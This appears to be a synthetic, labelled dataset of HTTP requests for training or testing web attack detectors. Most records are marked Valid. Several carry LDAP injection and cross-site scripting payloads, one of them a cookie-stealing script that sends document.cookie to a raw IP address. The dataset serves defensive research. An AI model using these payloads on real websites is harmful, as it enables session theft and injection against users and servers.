Referer: /9i2vhhsi.asmx
TE: chunked;q=0.1
Trailer: Authorization
User-Agent: 3ror/5.2.2
UA-CPU: Sparc
UA-Disp: 9474,169,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4730x760
Via: 6.5 www.ntcmosw.js
Transfer-Encoding: compress
Upgrade: gh9st/0.8
Warning: 229 www.n61e.shtml "wbSpiker" 
X-Forwarded-For: 170.97.95.101
X-Serial-Number: 4037485153
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26268
Start - Id: 20555
class: Valid
GET /nyanohayuheyors9he/Oe4nosaesrieokba5s/RSobjectH_/vOptui0Nrst/nXL56X/acceptpHc4Uq2@2/u59lCBUbMmq-zB_b/nyFx/a3FZR/nsXJymx/NWoupdate/ChyUhxitlySneian2d.tiff? HTTP/1.0
Host: www.tylxnoEt.it
Connection: close
Accept: */*
Accept-Charset: utf-7, euc-tw;q=0.7, windows-1250, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 81.216.56.230
Cookie: eIeaaa5c=9>ti
Cookie2: $Version="2"
Date: Wed, 21 Dec 05 03:46:12 GMT
ETag: "4rrBzuI9ibDX-TlLQ"
Expect: 100-continue
From: ulWo@oouhhaArah.de
If-Modified-Since: Mon, 09 Aug 04 14:48:03 UTC
If-Unmodified-Since: Sat, 28 Apr 07 09:31:48 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Oct 04 13:02:13 UTC
Max-Forwards: 614
MIME-Version: 6.3
Pragma: om=mzenese2
Proxy-Authorization: slhuno anrr9=ilycxcEs
Authorization: Basic bm90NDRvdzppdG5nc2hy
Range: 877-
Referer: /euCa.pl
TE: trailers,deflate;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/8.8 (Windows; U; Win98 8.2; nw-ae; rv:3.6.2) Gecko/03039456
UA-CPU: x86
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2533x094
Via: 4.9 www.aYbte5.png
Transfer-Encoding: deflate
Upgrade: rute/4.1, nnxcu/9.0, tateem/4.5, gelU8/2.5
Warning: 437 www.asscsur5.html "bthnowfvasnmeueoOe" 
X-Forwarded-For: 206.2.157.2
X-Serial-Number: 6248671751419598
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20555
Start - Id: 9525
class: Valid
GET /HTw/OxN1Bp88Gpassthru/exlsqeOD_UXBi/2@mYt8r2P/tP9uV113XX/rat8ha/tScfosin2sunu/o4ata7aasaajgucsRkhj/s5rtao8teltaSm/sg@P1c5r8KLiTvwck_gg.gif?uAsfgLelT=2076&EtPZx-o=eU85o-CJJhLW&meth=sssepw&etzcNctetdahht=sW04W&dtittgnzOkt=hhtt%7Cj66 HTTP/1.1
Host: 197.126.166.170
Connection: close
Accept: */*;q=0.4
Accept-Charset: hz-gb-2312;q=0.8, x-mac-ce;q=0.7, windows-1257, x-mac-roman;q=0.4, euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 95.57.226.135
Cookie: Enmdiayl0e=ede@
Cookie2: $Version="2"
Date: Sun, 28 May 06 22:57:55 UTC
ETag: "wRi26HRC9bfcc@uOd"
Expect: 100-continue
From: i2nofe@soetse.biz
If-Modified-Since: Sun, 26 Dec 04 04:29:26 CET
If-Unmodified-Since: Sat, 26 Sep 09 17:02:41 CET
If-Match: "qEQXhou8b7e2_ci"
If-None-Match: "dWaL.Q.bHtkZP0P."
If-Range: "RtIcaAauQYRCPN."
Max-Forwards: 1
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: UraeR rlDgih=Tobabi
Authorization: noweu 4nrus=drhaeaol
Range: 4-77
Referer: http://esrnoT.uk/dyHshne.aspx
TE: gzip
Trailer: Range
User-Agent: kitqzeo (oy2fs6xq.P)
UA-CPU: 68000
UA-Disp: 389,574,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 279x7075
Via: 4.4 www.tIs39ei8.jpeg, FTP/7.6 www.rljlgjsr.gif, 9.0 80.12.85.149
Transfer-Encoding: gzip
Upgrade: zZr/7.6, ri9ps3/0.6
Warning: 724 1.186.0.197:4 "pvtse" 
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 2426894
----: -------------
~~~~~: ~~~~~~~~~~

null

End - Id: 9525
Start - Id: 3161
class: Valid
GET /xtNp/nFhQ-K/90u7tzBO9S9PU7w1@8r/eCQg13Wycp67SG7OLVul/6d1AmR0JqEh@S.pAuYQf/iW/a6xm5eDtK4kdcxs/xtKhu7qVx.FeFAaDeft/ttXjAh/ees2lOlzkatuDasabsel/etnoc/fe9oiiooTt.html?rgEaabeeTb=983&swTcOiakeeccsdl=9etse3udbaf&geSaa=Aeot0cy&rowebeE=ndazunakcb4&tleDsOreo8rl=wnuisbeltRe7pu1 HTTP/1.1
Host: 84.45.132.248
Connection: close
Accept: application/*;q=0.0, text/*, audio/x-wav
Accept-Charset: iso-8859-8-i;q=0.3
Accept-Encoding: *
Accept-Language: s-eo8sjx;q=0.6
Cache-Control: no-store
Client-ip: 154.84.238.105
Cookie: atT9=99089;F7zTFiYv=eIey;sT@36W=nincludesta atrapow0atv;xYjNo9=5;sl9=zt
Cookie2: $Version="69"
Date: Wed, 30 Dec 09 11:11:58 GMT
ETag: "28zdgafJG.99TaPd"
Expect: 100-continue
From: 6jethpt@ukvalodoo.net
If-Modified-Since: Sun, 25 Jan 04 12:16:43 UTC
If-Unmodified-Since: Mon, 20 Feb 06 20:06:19 CET
If-Match: *
If-None-Match: "mp.PHap@ELKG4aPxo"
If-Range: Thu, 13 May 04 18:42:01 GMT
Max-Forwards: 822
MIME-Version: 5.6
Pragma: doR=dny
Proxy-Authorization: Basic OHRyZTpUZWttd3N0ZQ==
Authorization: Digest realm
Range: -47302,-8,36738-
Referer: http://h0I0.net/toAts.tar
TE: trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/8.6 (compatible; MSIE 3.4; Open BSD i386; ycimr; hneiiogeb; iuoiudoots)
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5717x5114
Via: 6.1 www.Nea07in.jpeg:98464, 6.4 173.114.104.38
Transfer-Encoding: compress
Upgrade: ianerr/8.5
Warning: 132 www.nTshc.jpg "Fieyiaatdeh" 
X-Forwarded-For: 227.104.147.72
X-Serial-Number: 37153368506514
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3161
Start - Id: 38026
class: LdapInjection
GET /fFoznG5vle3OCdznn5.png?qtjtt=8&Lhttp3e39Xbx=%29+++%28+%7C+%28cn%3D*o++++%27brien*+++%29%28mail+++%3D*o++%27brien*+++%29+ HTTP/1.1
Host: www.Dg5vydxen.be:20963
Connection: 6SOrnr
Accept: text/*, audio/x-wav;q=0.7, image/jpeg;q=0.6
Accept-Charset: cp-932, big5;q=0.7, macintosh, iso-8859-4;q=0.9, iso-8859-7;q=0.9
Accept-Encoding: gzip, deflate, identity, identity
Accept-Language: 27tni-tr;q=0.6, r-Obtyaqf, raey-t
Cache-Control: no-store
Client-ip: 252.123.213.7
Cookie: _ORh0WHwLX=eRiwli8EdeDh;aflrsr6q9=d9upsns;tlfy5oaegisoMae=1bs;B93odtohcoihssb=wfAr7Z7L1;ranorEqGwn77h1=c
Cookie2: $Version="157"
Date: Fri, 09 Mar 07 08:49:36 UTC
ETag: "c@9mSDK4Mtu5MpRA24Q_"
Expect: eaes4=oetnrgT
From: aFbh@rtrss.de
If-Modified-Since: Sun, 14 Mar 04 01:33:24 CET
If-Unmodified-Since: Thu, 23 Aug 07 16:14:17 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Aug 05 14:26:52 GMT
Max-Forwards: 5873
MIME-Version: 8.2
Pragma: aeb3=omtagote
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: NTLM TDdZaTluc0xseGhwNHlJbW5mZXRhYWhpZG9yc29vZW0=
Range: 67-6,809162-
Referer: http://haxbNea.it/a3d2u2.png
TE: chunked;q=0.5,deflate;q=0.0,trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.3 (Windows; U; Win98 1.8; wl-cn; rv:9.5.1) Gecko/50974369
UA-CPU: x86
UA-Disp: 2707,126,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 427x816
Via: FTP/1.2 www.3eTae.gif:35, HTTP/4.4 233.138.77.191
Transfer-Encoding: gzip
Upgrade: aol/0.7, dxme/6.7, otfplt/6.5
Warning: 508 192.205.119.35 "nt4dwdbahmiorotHpmts" "Tue, 19 Apr 05 13:54:10 CET"
X-Forwarded-For: 59.200.146.205
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38026
Start - Id: 12214
class: Valid
GET /teicttn4aRrdSir/kY4u/pySiofV0eDy75o/uv6BqqALS.js?ipid95dugb5oNc=Wsef&wcro4fips=586stcluq1&5zsuiupnt=eyrU&uW-IL32Vunion=wKSsXWK0E&fta=k%29melt HTTP/1.1
Host: www.aaaa5mo.biz
Connection: close
Accept: */*
Accept-Charset: iso-8859-4, windows-874, windows-1252;q=0.3
Accept-Encoding: compress, compress;q=0.5, deflate;q=0.8, deflate;q=0.0, compress;q=0.3
Accept-Language: *;q=0.0
Cache-Control: max-age=31977
Client-ip: 230.191.179.120
Cookie: co=qrurToa;ooartiynisOq=550591;le3ara=szo;Dih5awntcrqj8=da=r;Cp3Sz6neeonn=999643;ifoveitiXtk=sc
Cookie2: $Version="000"
Date: Wed, 08 Mar 06 06:07:37 GMT
ETag: W/"KHqEuwiKZSr65gOlSy9z"
Expect: Au4dSmh
From: msaq@tanxaosh5.ch
If-Modified-Since: Sat, 08 Jul 06 20:54:29 GMT
If-Unmodified-Since: Fri, 23 Jan 04 01:13:49 CET
If-Match: *
If-None-Match: "76LrxZBEDOolxl6"
If-Range: Sat, 31 Jul 04 02:57:05 GMT
Max-Forwards: 3
MIME-Version: 8.7
Pragma: tgrrea=mmpq4
Proxy-Authorization: whuq neane=nte9e
Authorization: qollsc TgairLl=riqec
Range: 979-59,-86,99671-
Referer: http://www.os1o3wue.uk/dH2e.gif
TE: trailers,chunked
Trailer: Expect
User-Agent: Mozilla/2.7 (Machintosh; U; PPC 6.8; rh-ga; rv:1.5.0) Gecko/45411103
UA-CPU: x86
UA-Disp: 3158,9578,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 161x2699
Via: 5.0 45.207.182.185, 3.2 www.srymmmo.png
Transfer-Encoding: identity
Upgrade: ahtmp/9.8, tynye/2.5
Warning: 093 www.niwbedo.shtml "3eaiaiRarlwbw8hiaee" "Tue, 10 Jan 06 12:35:20 UTC"
X-Forwarded-For: 28.18.79.109
X-Serial-Number: 411227
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12214
Start - Id: 16141
class: Valid
GET /hDI5iC_/yqBSMF/qAw11F6@6pixO/qF.idntxq/@IAhftpfU/oiTwt/oZ4aBdqKe/ma/crdssym.nsf? HTTP/1.0
Host: www.Lzti.fr:34
Connection: MmhaMLsv
Accept: text/html, audio/*;q=0.2
Accept-Charset: x-mac-chinesesimp;q=0.7
Accept-Encoding: gzip;q=0.4, compress;q=0.3
Accept-Language: n-Bzzlut, hhi-t, kl-oht3aln;q=0.5
Cache-Control: no-transform
Client-ip: 17.158.128.83
Cookie: a0=vh;pEzLyulh=i.6G3ETS5;2otterhphl=gxp_@/r
Cookie2: $Version="550"
Date: Sun, 11 Feb 07 05:35:35 CET
ETag: "DmIPd3.5oykWdKWDL6"
Expect: 100-continue
From: nt6y@jrn3wp.st
If-Modified-Since: Thu, 28 Jun 07 18:07:49 GMT
If-Unmodified-Since: Fri, 16 May 08 11:06:02 UTC
If-Match: "ootexvUCaRNdXWXcfKm"
If-None-Match: *
If-Range: Sat, 29 Nov 08 01:35:36 CET
Max-Forwards: 5
MIME-Version: 1.5
Pragma: 5tr=ne
Proxy-Authorization: Digest opaque="PcngeE"
Authorization: pdct 2nOvrmp=yanfl
Range: 396-,06-480,6-
Referer: http://www.noat.st/teeiX/e6herlu/nstlx/oxtajeay.png
TE: trailers,deflate
Trailer: Trailer
User-Agent: d7ebniyptSr
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 846x8936
Via: pEwklg/4.3 180.7.244.230, FTP/9.8 144.29.80.228
Transfer-Encoding: deflate
Upgrade: 0n1no/3.8, a1ogu/4.2, nz7eem/1.9, srsgz1/5.5, krtea6/0.1
Warning: 819 www.htahn.html "47kuswi" "Thu, 19 May 05 07:26:39 UTC"
X-Forwarded-For: 162.250.140.40
X-Serial-Number: 38500847837
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 16141
Start - Id: 47345
class: XSS
GET /sArh6soeqi1uilstarll/Q@wf_7XDUu.KF/XJyKmailujhVs6/1UbtOOHEPBM2jqC/Cocopy16slogu/wMmjyLLK/@Tc4@/lunflxlorynsti/eGM3WslQS.js?houEparhO=%3Cimg+++++src%3D++%22++stietrto+%3E+%22+onmouseover++%3D++++%22++%5Balert++%28%27TQs4ai%27%29%3B%5D+++++%22+++%3E&opt@Ll@fvN=c%5D&1hwwikueftLlixd=7&totmcwfe8=16&68=%5BM HTTP/1.1
Host: 224.68.226.226:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: 0o-u
Cache-Control: min-fresh=9
Client-ip: 78.22.181.142
Cookie: neofs5arimtno=lsanybtsjeth;tsemimz=u5Naat]de8ehwfw[;x0F.S=sf(ni[;ijertnqARdxa=eydteNvpotr;ahlne=[wig
Cookie2: $Version="38"
Date: Thu, 08 Mar 07 05:41:00 GMT
ETag: W/"@ohBoT1s.JGyaGLB2"
Expect: 100-continue
From: Ecnsai@ss9aup.gov
If-Modified-Since: Sun, 04 May 08 22:32:47 GMT
If-Unmodified-Since: Thu, 04 Oct 07 14:44:48 CET
If-Match: "W@SFa1Soj@Xczg13"
If-None-Match: "H.7ieAko@6GK25PU_Sca"
If-Range: Mon, 10 Aug 09 23:37:08 CET
Max-Forwards: 58
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic cmlvYlNhZVg6bm1kbW1saQ==
Range: -066761,152-
Referer: http://www.oeow.gov/Iikwt/8uoel7se/tdt2a/nmsmz.mp3
TE: trailers,trailers,deflate
Trailer: Trailer
User-Agent: stthOhehC (aLx6-GFx; uNgvFG@5; sX-flfuKS0; fcQKYL@CV; rRodgK)
UA-CPU: MIPS
UA-Disp: 699,6656,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 575x5791
Via: FTP/5.9 176.31.159.123:6
Transfer-Encoding: identity
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 030 32.43.121.212 "zsmp" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47345
Start - Id: 48261
class: XSS
POST /eD1r1/eyLmZC/h6the9aahm/pVoDperl/nnD/bF@NuOPFWUWSvSjWU/uhtbowln2mra9/MEobjectae/7FTy6_3v/e9mfobrnqretie35/idlznwlattdhdnQ.gif? HTTP/1.1
Content-Length: 282
Content-Language: owm7gow,a,TplbwTo
Content-Encoding: identity
Content-Location: /Caig.gif
Content-MD5: Ymlzbm9hZWVtN2lTaVhzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jun 07 08:20:06 GMT
Last-Modified: Mon, 17 Sep 07 05:59:33 GMT
Host: www.nreeNas.be
Connection: 9mem8ssw
Accept: */*;q=0.1
Accept-Charset: x-mac-greek;q=0.1, shift_jis, euc-tw;q=0.8, utf-7;q=0.7, iso-2022-kr;q=0.8
Accept-Encoding: 
Accept-Language: hz1-getenlst;q=0.2, nx-swiop;q=0.6, e2e-oSotLurd;q=0.6, ej-reOrd, et-p4n
Cache-Control: no-transform
Client-ip: 30.86.234.222
Cookie: 6QLzVEI=tKBuFM1rR;ezTe6nir=<xml id   =    "   X     " ><a ><b  >&lt;script    >[window.open('http://8.34.77.150/todela.dll'+document.cookie);]&lt;/script >;</b    ></a   ></xml   >;hE3tbz8AS8=ebodyetaeh
Cookie2: $Version="016"
Date: Thu, 25 Feb 10 03:00:18 UTC
ETag: "TO6ROFEq@RhgdBc"
Expect: ynynnm=nitai
From: astmd@urn3eltYo.fr
If-Modified-Since: Sun, 25 Jan 04 07:30:16 GMT
If-Unmodified-Since: Wed, 15 Mar 06 11:18:00 GMT
If-Match: "QIl9OhH1p_E5tfgEY"
If-None-Match: "Qrob@1_U3P9WuH05Auq7"
If-Range: Sun, 10 Apr 05 18:20:26 GMT
Max-Forwards: 9150
Pragma: iee=tnds
Proxy-Authorization: NTLM ZWlUbnROMmFkYW9pdDBxYTJuc2VhYXVlZWFodEV1ZWQ=
Authorization: NTLM dG5zZXUxc2luZnRicjd0TGx2dGl0dXNtc24ydmF2cmly
Range: 7-87,-217769
Referer: /rUaim.txt
TE: gzip,gzip;q=0.2
Trailer: If-Match
User-Agent: Pweleha (qmA2voLU1h; t0I2qM@; 6@CGlwWa)
UA-CPU: Sparc
UA-Pixels: 9755x524
Via: 8.8 www.q77bs.jpg, FTP/8.5 205.229.231.40, 6.2 74.123.239.118
Transfer-Encoding: compress
Warning: 398 244.34.75.168:33 "moboleremetearlet" "Mon, 09 Jan 06 23:06:44 GMT"
X-Serial-Number: 64409334
----: ---------------------------------------------

a87A9eQKM=DsSipcj6hpdhm7eS&trndeue9Xsatara=ra&aD=xW4p et]i&YLiw=62&4ymeartnt4nt=wn53ttelj&nhoehdEa=69&etelcssuFrasarl=h6p.KhqzG&god6hoodUjeam2t=490752&hI4nNleoafbor=iCA@.IrN51dE&NnfnpfoeJziwedt=utu&f6oQln=irfarn6qdteDoa&efrIbet5c=4618&eSsl=1&7tuAlnrt=5663&apili6toedSssyj=079998

End - Id: 48261
Start - Id: 28957
class: Valid
GET /eYpAl1BCZ/oogilc4srOce/nA2z05p2F/tAAfxxHti/05eeq1aslw1gell/y1Wj/ttearoxeeota.html?eaRoeehorEtda=8770769&cdpwdnee=iXpH%40brj HTTP/1.1
Host: 251.42.108.51
Connection: close
Accept: image/*;q=0.7, application/*;q=0.7, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ErdaohWw-C, ah-yie
Cache-Control: no-transform
Client-ip: 26.226.102.173
Cookie: elhl=eyturiydqutnnf;LZAfHFFmochanE=auhqeeawMTevld;xojm5swasmei=t;ai8elcb=5
Cookie2: $Version="30"
Date: Thu, 26 Oct 06 09:59:30 UTC
ETag: "AlH_ZvVv78c5KA9P@U"
Expect: 100-continue
From: h5hrlh@Esuhia1.cz
If-Modified-Since: Mon, 08 Jun 09 23:29:41 UTC
If-Unmodified-Since: Thu, 02 Jun 05 20:30:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 6.8
Pragma: e=iK8to
Proxy-Authorization: NTLM czFjaGFhYm1ybnRoaWFlbWVzM2F0M2lsNm5jb2VhdGxhcnBmMWdpZWI=
Authorization: Digest nc=FAbBf1B9
Range: -332385,-432,1995-63
Referer: http://aeteTo.de/th7U0Ol/eadgolY.swf
TE: gzip;q=0.9,trailers,trailers
Trailer: User-Agent
User-Agent: egmnqnsnE (gyAp@nSTH; t5YJLM; n_WioWc7)
UA-CPU: MIPS
UA-Disp: 3550,9047,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1053x1221
Via: HTTP/1.3 www.cxwen.html
Transfer-Encoding: compress
Upgrade: SDtt/0.6, mnhrp/9.3, edgePn/8.1
Warning: 060 221.176.165.132 "oh3respRbbacere" "Fri, 16 Mar 07 05:27:50 UTC"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 7184697
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28957
Start - Id: 29154
class: Valid
GET /uE7l/hc6g/5FS8FjC/ntwS3nsr.jpg?ghlaqc5=oau6msv++include&dotnysf=aa&Oawecif4sgsman=55753654&0otttytedo=obf&thoricee5Mdlt=feenxua1macf6Qkelb&te6asmhbe=04&attaRdyew=08&relhAelwj=+%40&msdow3bitatdd=ijfdnfitet6oi&uniongLa6nodeYbR=arnM2dem&3Efa4nrn=15727&a@rmRdivVN4Q2.=72sonh8 HTTP/1.0
Host: www.prxltr.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932
Accept-Encoding: *;q=0.5
Accept-Language: ighy4-sda;q=0.7, LNCtle-asoeaeie;q=0.4, rtt-sod
Cache-Control: only-if-cached
Client-ip: 120.85.174.38
Cookie: jdivJ.vfin5yb=y
Cookie2: $Version="4"
Date: Sun, 20 Sep 09 14:44:14 GMT
ETag: "7rsEknd1N@inEVcX"
Expect: 100-continue
From: espn@htNyusgoaB.com
If-Modified-Since: Sat, 06 Oct 07 16:39:47 CET
If-Unmodified-Since: Wed, 17 Oct 07 12:10:03 GMT
If-Match: "XVm11j.AE8c_P374e8kt"
If-None-Match: "a8-a4nRg8A8bQi1l"
If-Range: Thu, 08 Oct 09 24:26:12 UTC
Max-Forwards: 5081
MIME-Version: 6.1
Pragma: 5ee='cRsc'
Proxy-Authorization: r6cRja o1ns=aoel
Authorization: NTLM MmxXZWNyb3Rjb2F0emVlemVhdGlpb2JlbWF0b2RUaHBOc3Jya25ydA==
Range: 7756-,-27098
Referer: /eaeeesN/itohgq/inVd4ash.exe
TE: trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/9.9 (Machintosh; U; PPC Mac OS X 4.9; lo-8u; rv:7.8.1) Gecko/19524374
UA-CPU: PowerPC
UA-Disp: 758,7778,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0871x656
Via: 7.5 www.oean0.css, 9.4 www.tDes.css
Transfer-Encoding: gzip
Upgrade: 8yqoe/8.0, a0aFi/4.0
Warning: 541 www.4a4g.htm "hsud1cbtsg" 
X-Forwarded-For: 97.58.176.102
X-Serial-Number: 59543
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29154
Start - Id: 47977
class: XSS
GET /dn3taneritmhinL/t-DEYbOce-YazeUMuoix/ZGzxiframeIqDgk.1TI/eaSPMWlZw3iSpeN2Pf/vB@NPbGu/75Jwinclude/mr7mIEFp.png?srgie=mlhtJRycnmtrezAn&dhmvtitwuzi0ie=Etjdmlutort&tadfwoeane=4470697154&yTeeeirebaa=%3Cdiv+style++++%3D++%22+binding%3A+url%28%5Bhttp%3A%2F%2Fwww.mese.com%2Fscript%2Fenhfa3oet.php4%5D%29%3B+++++%22+++%3E&ahonaacf1h1utzx=iise&T6HDusrDJKCn2Y=85057&fslhpo2eev=18262&in9i=%3D+homesI&Qba=nan&0ditacludq=2376692107&usdh8s=0&niEpbenfhle0zn=dseizeesgl7p%3Asae&xwasrudeeut=sl&rngsiaeotB=tforml&der3aneSs=58 HTTP/1.1
Host: www.oaf0ieyn.cz
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: 8jd-i;q=0.4, Sti-nm1wre, nedll-s, wf-rgaRrRe;q=0.1
Cache-Control: min-fresh=55126
Client-ip: 233.73.193.14
Cookie: fS=lm4aivuooDlery;execO-0d8swherewV=004;iettr=4806007;abp2aesheo=aIo;7Sq07ot=04Zs@0
Cookie2: $Version="0"
Date: Fri, 31 Aug 07 18:06:30 UTC
ETag: "kFEKDuKQ32KeyH6uwq"
Expect: 100-continue
From: etro@rlateera.gov
If-Modified-Since: Fri, 05 May 06 05:17:55 GMT
If-Unmodified-Since: Wed, 13 Oct 04 15:45:00 CET
If-Match: *
If-None-Match: *
If-Range: "vXqXj2J3_xGeop3_J"
Max-Forwards: 986
MIME-Version: 0.3
Pragma: 3EtsTeto=nediHeN3
Proxy-Authorization: Digest nc=b2c271ed
Authorization: perh hrio=Emhlie
Range: -4,8-
Referer: /zuitCuNH/eehx4e/ao8ocn/xwde7ees.exe
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/8.8 (Windows; U; Win98 8.1; 4y-ah; rv:2.4.6) Gecko/09869290
UA-CPU: MIPS
UA-Disp: 719,994,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 480x167
Via: 9.5 www.hnaet9i.png, 5.5 www.5Sr6.htm
Transfer-Encoding: compress
Upgrade: eat/7.3, imnF/6.2, 5tcs/7.4
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 23.144.158.109
X-Serial-Number: 41529
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47977
Start - Id: 25934
class: Valid
GET /taR.tq/eaor/zf/m6-V/yhomgthbAqt0/rKMC0/lMJC/U8ms/hn/z2fjahnieeiz.html?sM8tkteuints=834454&aismvznw3anhe=opRqW0&iwcDmcityIiaw=tWl HTTP/1.1
Host: www.dIelgfe.biz
Connection: close
Accept: text/*, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: el-mlu4mPa;q=0.9, kbpt-e, 7ars-Uli, eo-mxnsnfi
Cache-Control: no-transform
Client-ip: 5.150.27.149
Cookie: 6pee=r>x2lr'Hnmeta;cEwO16T=8no lo-q   @t;srehs=tf;mW.Id=j
Cookie2: $Version="741"
Date: Sat, 01 Jan 05 12:19:56 CET
ETag: "eiDN7Tz@qZy.F3MgZQ"
Expect: 0nsepEe=Ea7Q3
From: naaufvp@rOayez.uk
If-Modified-Since: Fri, 23 Dec 05 21:49:04 UTC
If-Unmodified-Since: Thu, 13 May 04 03:26:36 CET
If-Match: *
If-None-Match: "EHcXEA8nKFpkEv3opt"
If-Range: *
Max-Forwards: 2986
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM bmVoc3llZXdpRXJ0OWtibXdpNXlyZGRpcml3cGxtcnBzZ2FpcW1qNHRF
Authorization: ahtwme 2fda=jhaaQ
Range: -1909,0060-494,6-
Referer: http://nete.st/fi9sr/cto86qlu/rh7mi/feenrkA.php4
TE: trailers,chunked;q=0.3,trailers
Trailer: Host
User-Agent: geanshnLybes3raeet
UA-CPU: StrongARM
UA-Disp: 9734,8535,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5187x1770
Via: neeetu/3.1 www.Ngilzh.shtml, 7.9 www.omvdb.js
Transfer-Encoding: identity
Upgrade: L5mEt/8.6, onmhis/9.1, yacc0v/3.3
Warning: 600 www.rong.jpeg "ecdetwej" "Mon, 19 May 08 07:00:07 UTC"
X-Forwarded-For: 106.231.90.123
X-Serial-Number: 1807971586692
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 25934
Start - Id: 5065
class: Valid
PUT /wemri8snn7uHzf3Mth/yc8y_@TeqTrMS/fSbYdVQE/noniacaoweepareewr/ewXCEX@Lyy0/lpeaalaNniilcr/uYeo/fEdGu@JX2r5.css? HTTP/1.1
Content-Length: 300
Content-Language: iei2w9,a7otol8o
Content-Encoding: identity
Content-Location: /eclNij.swf
Content-MD5: SWtzdXM5dHRxaWR0c0drcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 May 08 24:52:37 GMT
Last-Modified: Fri, 26 Dec 08 11:43:43 CET
Host: www.6menq.com
Connection: tuouF1
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 109.59.176.137
Cookie: tacwheti2whcp=5;6ThhA=jiQSFnPHHq;WpbinetCeodw=ts5ra9tnna0yE;lenpp7hoioie=71;8.XcSq3GL2H=4;e5ono=7292
Cookie2: $Version="718"
Date: Wed, 18 Feb 09 12:55:06 CET
ETag: "ysQeb7HLdpYvo.M2T"
Expect: 100-continue
From: adhno@nitwillnza.be
If-Modified-Since: Tue, 05 Oct 04 05:19:37 CET
If-Unmodified-Since: Thu, 20 Sep 07 16:16:31 GMT
If-Match: "Tiqju.UdXgXHv8bdwVbg"
If-None-Match: "Z3zpJizC0k65McRw"
If-Range: *
Max-Forwards: 0
MIME-Version: 8.8
Pragma: nda=iP4o8twc
Proxy-Authorization: NTLM dGN1YXVmdXRpRWljaG5ydDNvdHZpZThzdGFCdGhuZXU=
Authorization: NTLM b2lpZGllZGhjaGlla2xtMW9hcmNua3llV2xyMmJkYWl0NWl5aUJBaVNoM2hub3Mz
Range: -75679,92-5
Referer: /ipesc.mdb
TE: trailers,trailers
Trailer: If-Range
User-Agent: sbhIBzg http://www.bczspsf.fr
UA-CPU: PowerPC
UA-Disp: 522,847,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7508x091
Via: 4.9 www.rehrpc.jpeg, FTP/8.7 206.120.54.38, HTTP/6.2 106.101.120.60
Transfer-Encoding: deflate
Upgrade: hattj/5.9
Warning: 467 150.166.100.47 "uemut595tnsdte" "Mon, 06 Dec 04 06:40:13 GMT"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 768218785
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

